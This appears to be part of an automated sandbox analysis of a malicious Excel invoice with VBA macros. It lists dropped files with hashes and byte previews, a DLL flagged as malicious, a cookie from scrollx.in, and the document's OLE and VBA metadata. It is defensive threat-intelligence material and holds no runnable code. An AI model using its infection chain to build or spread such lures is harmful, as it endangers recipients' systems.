                                                                                                                                                            SHA-256:DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
                                                                                                                                                            SHA-512:FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                            Preview: ....l................................... EMF........).......................`...1........................|..F...........GDIC........L0.U......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_EXCEL.EXE_6f227b18f49da44a2d1889aa10939f535bdc_0bd2ab0e\Report.wer
                                                                                                                                                            Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16734
                                                                                                                                                            Entropy (8bit):3.714145190828899
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:23s4HBakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOL:2jyBKzFCEuhTlyZlz+lVaJa5GG
                                                                                                                                                            MD5:09ED45F1BA180F7C4BDDCCFA2421196B
                                                                                                                                                            SHA1:CB7694D9A8C328754E2429EDA921C470501C1A4A
                                                                                                                                                            SHA-256:A3DBC50E1A6C991DD5DB447B5F0FD0E1190ED0D7BC2F293EB48D40482AF232DE
                                                                                                                                                            SHA-512:2C6511F572FD6416DCADC04BB637D229674D1D3DED1AB474D339A2B42DD5F6A6FDDC7592C4E97EC58D7C42E8E751DB9C832B26E15E8A0263E16E0122C6F9F534
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.4.9.3.9.6.1.7.3.3.8.8.9.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.4.9.3.9.6.3.4.3.4.2.9.2.8.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.a.d.d.8.7.a.-.5.4.e.c.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.a.d.d.8.7.9.-.5.4.e.c.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.I.d.=.3.7.0.1.1.5.9.2.6.1.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.T.a.b.l.e.=.3.8.0.7.0.7.5.2.5.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .N.a.m.e.....S.i.g.[.0.]...V.a.l.u.e.=.E.X.C.E.L...E.X.E.....S.i.g.[.1.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .V.e.r.s.i.o.n.....S.i.g.[.1.]...V.a.l.u.e.=.1.4...0...7.0.1.5...1.0.0.0.....S.i.g.[.2.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .T.i.m.e.s.t.a.m.p.....S.i.g.[.2.]...V.a.l.u.e.=.5.1.c.c.a.7.c.d.....S.i.g.[.3.]...N.a.m.
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\050F0000
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):58293
                                                                                                                                                            Entropy (8bit):7.859004361891608
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:hAjRzggbLmCf6646CIK4fxalO77nXblvNbsLNFqqW:hAj1rmCM2U877X5vNb+xW
                                                                                                                                                            MD5:DA02AD566D93F2D945AC338963991BC5
                                                                                                                                                            SHA1:4063109EE9F53A1861E52F7AFA3F1C5D6C73097A
                                                                                                                                                            SHA-256:ECF16677D55711C79661EFF5BAC0BF3E15FEB1AF8253F949745F1B05B6F6F6E2
                                                                                                                                                            SHA-512:C4787CEF074745F61F4A7E1A331A3E1DE4BF99546B7D61E7A0BF8C4EDC73473077D6738B642E7FF3829B7BB2D88D991331C84789E8C9D24A98B0E2037F2867DA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1008733.cvr
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):1392
                                                                                                                                                            Entropy (8bit):3.163794334243885
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:bpll/+mANFssWtAFuoqquwGuNl/rkQaHke5PGqJcP+q7g5g0/D/UIOlhXU:1ll/+N6AuoZuDMlU6+24IIOjXU
                                                                                                                                                            MD5:C23C2CB0AC8870BA2D7A92D96A5C3420
                                                                                                                                                            SHA1:93FE60278681E0D0C176645B609A24BC62B1FCE9
                                                                                                                                                            SHA-256:2088A32187446B5C244EC82A7055CAD344C1F2E7ED2FD6E73BB3E40B1CC1A67A
                                                                                                                                                            SHA-512:20A51FC941CB0A7071CAE99785CA6820B8F5D073AD9D5A5C75A4E884253C70982BD72D3F6EBA2F167BBEE41E338A5AF073F742EEC711F9E7111FFDA5152675D0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: MSQMx........5,.................g..........................&.......9................................................................................V.......EXCE........................................5...g.......;...........<...........A...........l...........................z...'!......................'!..........e...........e........................................................................`........... ..................................U...........a...b...........N....................`..C...........F...........W.......DA...........@......................- ..........- ..........- ..........- ..+...........0....... ...:....... ...;....... ...........b...............................................X...........X.... ..........:!....... ..n"...........".......@...".......@...".......@...".......@...".......@...".......@..7#...... ...?...j...X.......j...X...........e.......9.... ......<...B............@../...................w`../.......................$...$............@..n370....w`..
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Cab35C0.tmp
                                                                                                                                                            Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                            File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):58936
                                                                                                                                                            Entropy (8bit):7.994797855729196
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                                                                                            MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                                                                                            SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                                                                                            SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                                                                                            SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):241332
                                                                                                                                                            Entropy (8bit):4.206812191244806
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:cGSLgQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:c7BNSk8DtKBrpb2vxrOpprf/nVq
                                                                                                                                                            MD5:79ACF2719DAC45A44EDF4D3DCA6AB037
                                                                                                                                                            SHA1:1F88A4B82DAF8ED65839BA35BAC0E149CBDC371F
                                                                                                                                                            SHA-256:026D105273980DB35AF04B25470B59480B09F204229B76FBD12541E7CD588388
                                                                                                                                                            SHA-512:5F31827A2DE40F1866E30BB7E3A36C1912D6EBD11330F6E7B33233366BB49076C8B5801CBDADE71BEDA53C7EFAC354F99CB72F44E9F7BB95B72E7BEE6522F7C1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Tar35C1.tmp
                                                                                                                                                            Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):152533
                                                                                                                                                            Entropy (8bit):6.31602258454967
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                                                                                            MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                                                                                            SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                                                                                            SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                                                                                            SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\WER4960.tmp.WERInternalMetadata.xml
                                                                                                                                                            Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3110
                                                                                                                                                            Entropy (8bit):3.677764698836754
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp3IIj3:Wl7LBNuhhgG45nv5lD
                                                                                                                                                            MD5:FA8FD1AB99C64263B25A5078306E7258
                                                                                                                                                            SHA1:3F60633349BCDA67D767B24FE6546F3C964928A5
                                                                                                                                                            SHA-256:712A58072649026F50E8B0D1B5A85CDFFD1007D06B75FA4EC371BE62B7D39AFE
                                                                                                                                                            SHA-512:7AE56D401FEA1E8B0D17BD89F444C1D2DDC60C401382623BF5D145365106C6F3CDACC7780714701C19875BFD93888CEDE24E103E9977CF5AFC88D0DDADBDB149
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.a.r.e.n.t.P.r.o.c.e.s.s.I.
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\lwjmdgav.dll
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):319488
                                                                                                                                                            Entropy (8bit):7.125176562164236
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:5HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:RdO02Srnh0qEJC+Y218jdU
                                                                                                                                                            MD5:597B02A17B8C012E25FA0A668004163B
                                                                                                                                                            SHA1:424A6F131D5C765EFDB28E5CAAE5FE2834A82BB0
                                                                                                                                                            SHA-256:E3F7EB34C3A1FD306C7788096CB666F3362BA5AA78710074B61DD03F829B8AFD
                                                                                                                                                            SHA-512:C75D875F3ABE620779380E7AE0F4BBB59B0C823B40889084B51396CD166187CBD90F7FB4159969DF1C7C241930BAA93BD051BF2F8FFF9CB8402D00CFB60062D4
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:._...........!...2.z...b.......&.......@...............................@..........................................................|....................0.......................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.6....p.......2..............@..@.data................4..............@....text4...R.......T...R.............. ..@.rsrc...|........0..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 12 14:40:00 2021, atime=Tue Jan 12 14:40:00 2021, length=8192, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):867
                                                                                                                                                            Entropy (8bit):4.466053005520158
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:85QMtCLgXg/XAlCPCHaXtB8XzB/6sU1X+WnicvbZ1ObDtZ3YilMMEpxRljKoTdJU:85RtU/XTd6jUseYe11CDv3qtrNru/
                                                                                                                                                            MD5:7D2E1392D21BFDB63A02967DAF8F3EA1
                                                                                                                                                            SHA1:B6372166FBA7F4D23C48D0B525871B2CFAE591EA
                                                                                                                                                            SHA-256:68A16DBEB58774F7E0B5BEF3EA7B9A2BB54AF9EB844D83A83E7EE971822FF450
                                                                                                                                                            SHA-512:4A9745AEAB0BEE634602F53D050FA8B85D5BE18C99F01C23190F93E8E3A98F9E3D566536E75E3C92595086BB782C30C9166CE3CDC970DD1D288A729EDE138E2E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: L..................F...........7G.....0.......0..... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....,R.}..Desktop.d......QK.X,R.}*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\960781\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......960781..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Inv0209966048-20210111075675.LNK
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Tue Jan 12 14:40:00 2021, atime=Tue Jan 12 14:40:08 2021, length=116736, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2208
                                                                                                                                                            Entropy (8bit):4.48517017590225
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:8Nn0/XTd6jFyZe110nxJWDv3qtdM7dD2Nn0/XTd6jFyZe110nxJWDv3qtdM7dV:86/XT0jF8nxJ9tQh26/XT0jF8nxJ9tQ/
                                                                                                                                                            MD5:8AA71395F36DD05D7F678BDDFE5E0F85
                                                                                                                                                            SHA1:5F1CF53E665E4A8E68E7E989BCDFE7242172E5CD
                                                                                                                                                            SHA-256:9C8EF792AF8253F0D968B1F7524E7BF7096AB230916E36FA256E9D540969C6F5
                                                                                                                                                            SHA-512:D657EDD9DFDFA639EC8093A1435C652E1B5BCB5513F8D776BF08E455B4C4E51966CFE0FA9903FC69FAE01F3BB38091CF049C3387E26AD9B2D9320D702FB429B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: L..................F.... ...>q...{.....0.......4.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..J..,R.| .INV020~1.XLS..n.......Q.y.Q.y*...8.....................I.n.v.0.2.0.9.9.6.6.0.4.8.-.2.0.2.1.0.1.1.1.0.7.5.6.7.5...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\960781\Users.user\Desktop\Inv0209966048-20210111075675.xls.7.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.n.v.0.2.0.9.9.6.6.0.4.8.-.2.0.2.1.0.1.1.1.0.7.5.6.7.5...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.........
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):137
                                                                                                                                                            Entropy (8bit):4.492055563388153
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:oyBVomMAVFtTJGVKd0LT3tTJGVKdmMAVFtTJGVKdv:dj6A3hEKU7hEKZA3hEKt
                                                                                                                                                            MD5:5CE2708381A90ED1D526BE053A53D751
                                                                                                                                                            SHA1:A954E918482248CC0536EBE0CFA342BA6FB1AD2B
                                                                                                                                                            SHA-256:1A300C84B22416BF6CB9056F99C0B14D664513A9EF079AAF8FC3000D70063485
                                                                                                                                                            SHA-512:2B7C3A8BD0D3FD2C7CA6241CF30D1EB83E79C389F6D9B1DBB2A7297F7D85716D50D436DB04ABFB462582F94FE40B0B70B0CD0F02A9ED9526D962796C56306C5F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: Desktop.LNK=0..[xls]..Inv0209966048-20210111075675.LNK=0..Inv0209966048-20210111075675.LNK=0..[xls]..Inv0209966048-20210111075675.LNK=0..
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZEL5A6R0.txt
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):111
                                                                                                                                                            Entropy (8bit):4.492288417144315
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:GmM/2qARclSEaDqlEapQvhKiL0cSXJzdaSmf3cX:XM/2aixhKolk9ESX
                                                                                                                                                            MD5:5BDB156BC8D2594BFF328E256D968F80
                                                                                                                                                            SHA1:8ACFD6C11D2E7CFF78EFC39B84AE79141C57B568
                                                                                                                                                            SHA-256:DAE9AA8B5A1AF68AAFF70D8E1045447B2AA05154C57F6BF27581996CA9FB3DD0
                                                                                                                                                            SHA-512:B3FC4EB0C4B50CA110F7C5C9D1F4856341EDC5BA254A5A19556D176CFB9E5C7D5ED087EBC37F19BBE13CC5FFB3321F1277B426FC56A63DEF828882878E791A14
                                                                                                                                                            Malicious:false
                                                                                                                                                            IE Cache URL:scrollx.in/
                                                                                                                                                            Preview: __cfduid.d65b0ee49a1b7baa363fc46fc16c8cadd1610433585.scrollx.in/.9728.2941374080.30867520.707499465.30861561.*.

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Create Time/Date: Mon Dec 7 14:38:21 2020, Last Saved Time/Date: Mon Jan 11 14:30:19 2021, Security: 0
                                                                                                                                                            Entropy (8bit):5.061929529755134
                                                                                                                                                            TrID:
                                                                                                                                                            • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                                            File name:Inv0209966048-20210111075675.xls
                                                                                                                                                            File size:78336
                                                                                                                                                            MD5:91baa6aad9201c0ccf3553a5b49eb967
                                                                                                                                                            SHA1:9c182826d5dc041970f31a8d584580f870c3996c
                                                                                                                                                            SHA256:01af3b5c1e2ed68272f542233aece70269a9e977815347a4b9c86bb2d97c086e
                                                                                                                                                            SHA512:6f610455f741694b2179c7bbf5b6fbeb48cee48a3097f7b4d0e9bb3242c783dbd2b672c0f03874bf595080ef7e4b65feb02cc1a36896a8ae402d2a24d93f198f
                                                                                                                                                            SSDEEP:1536:iwhWFk3hbdlylKsgqopeJBWhZFGkE+cL2NdAzLitpFa5i1jp5lGDl+AlmIa00md7:iwhWFk3hbdlylKsgqopeJBWhZFGkE+cH
                                                                                                                                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:e4eea286a4b4bcb4

                                                                                                                                                            Static OLE Info

                                                                                                                                                            General

                                                                                                                                                            Document Type:OLE
                                                                                                                                                            Number of OLE Files:1

                                                                                                                                                            OLE File "Inv0209966048-20210111075675.xls"

                                                                                                                                                            Indicators

                                                                                                                                                            Has Summary Info:True
                                                                                                                                                            Application Name:unknown
                                                                                                                                                            Encrypted Document:False
                                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                                            Contains Workbook/Book Stream:True
                                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                                            Flash Objects Count:
                                                                                                                                                            Contains VBA Macros:True

                                                                                                                                                            Summary

                                                                                                                                                            Code Page:1252
                                                                                                                                                            Author:
                                                                                                                                                            Last Saved By:
                                                                                                                                                            Create Time:2020-12-07 14:38:21.412000
                                                                                                                                                            Last Saved Time:2021-01-11 14:30:19
                                                                                                                                                            Security:0

                                                                                                                                                            Document Summary

                                                                                                                                                            Document Code Page:1252
                                                                                                                                                            Thumbnail Scaling Desired:False
                                                                                                                                                            Company:
                                                                                                                                                            Contains Dirty Links:False
                                                                                                                                                            Shared Document:False
                                                                                                                                                            Changed Hyperlinks:False
                                                                                                                                                            Application Version:1048576

                                                                                                                                                            Streams with VBA

                                                                                                                                                            VBA File Name: Module1.bas, Stream Size: 3215
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                                                                                                                                                            VBA File Name:Module1.bas
                                                                                                                                                            Stream Size:3215
                                                                                                                                                            Data ASCII:. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
